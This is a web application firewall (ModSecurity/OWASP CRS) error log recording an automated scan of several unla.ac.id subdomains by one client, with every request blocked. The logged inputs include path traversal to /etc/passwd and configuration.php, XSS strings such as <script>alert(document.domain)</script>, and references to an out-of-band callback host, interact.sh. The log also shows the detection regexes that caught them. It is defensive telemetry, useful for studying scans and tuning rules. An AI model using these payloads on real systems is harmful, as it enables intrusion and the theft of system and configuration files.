[Tue Aug 29 11:51:10.743573 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAkr0D8AAAAC"]
[Tue Aug 29 11:51:10.745309 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAm-MboAAAAI"]
[Tue Aug 29 11:51:10.920000 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PsCo-f0AAAm5BwIAAAAA"]
[Tue Aug 29 11:51:10.923346 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAmNp18AAAAQ"]
[Tue Aug 29 11:51:10.938788 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAknENcAAAAB"]
[Tue Aug 29 11:51:11.063191 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PsCo-f0AAAm@5vwAAAAH"]
[Tue Aug 29 11:51:11.541428 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnCKxgAAAAK"]
[Tue Aug 29 11:51:11.543307 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAm-MbwAAAAI"]
[Tue Aug 29 11:51:11.556492 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnB5UAAAAAJ"]
[Tue Aug 29 11:51:11.571972 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAm-Mb0AAAAI"]
[Tue Aug 29 11:51:11.572677 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAmIbPIAAAAo"]
[Tue Aug 29 11:51:11.604388 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15P8Co-f0AAAm-Mb4AAAAI"]
[Tue Aug 29 11:51:12.759747 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QMCo-f0AAAmNp2MAAAAQ"]
[Tue Aug 29 11:51:12.764542 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QMCo-f0AAAmHd9QAAAAz"]
[Tue Aug 29 11:51:12.764531 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAnHQdIAAAAT"]
[Tue Aug 29 11:51:12.780912 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm-McAAAAAI"]
[Tue Aug 29 11:51:12.809732 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm91mIAAAAG"]
[Tue Aug 29 11:51:12.813496 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAhhc0AAAAAd"]
[Tue Aug 29 11:51:12.820465 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15QMCo-f0AAAmIbPcAAAAo"]
[Tue Aug 29 11:51:12.852680 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm91mMAAAAG"]
[Tue Aug 29 11:51:13.548134 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAm91mQAAAAG"]
[Tue Aug 29 11:51:13.555136 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAm5BwgAAAAA"]
[Tue Aug 29 11:51:13.556732 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAkyyDkAAAAW"]
[Tue Aug 29 11:51:13.579731 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnCKx4AAAAK"]
[Tue Aug 29 11:51:13.585257 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAmQ-wMAAAAb"]
[Tue Aug 29 11:51:13.585996 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnGkHwAAAAR"]
[Tue Aug 29 11:51:13.586779 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnEqTgAAAAO"]
[Tue Aug 29 11:51:13.627241 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAjdQTIAAAAZ"]
[Tue Aug 29 11:51:13.628545 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAknEN4AAAAB"]
[Tue Aug 29 11:51:13.659718 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAmNp2gAAAAQ"]
[Tue Aug 29 11:51:13.677191 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAnGkH0AAAAR"]
